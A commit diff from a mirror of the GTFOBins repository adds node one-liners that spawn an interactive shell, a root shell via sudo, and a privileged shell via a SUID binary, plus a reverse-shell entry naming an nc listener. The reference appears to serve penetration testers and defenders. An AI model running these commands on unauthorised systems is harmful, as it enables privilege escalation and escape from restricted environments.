mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-25 19:54:14 +02:00
Add node suid, sudo, and interactive
This commit is contained in:
@@ -1,5 +1,14 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
node -e 'require("child_process").spawn("/bin/sh", [], { stdio: [0, 1, 2]});'
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo node -e 'require("child_process").spawn("/bin/sh", [], { stdio: [0, 1, 2]});'
|
||||
suid-enabled:
|
||||
- code: |
|
||||
./node -e 'require("child_process").spawn("/bin/sh", [ "-p" ], { stdio: [0, 1, 2]});'
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
||||
code: |
|
||||
|
Reference in New Issue
Block a user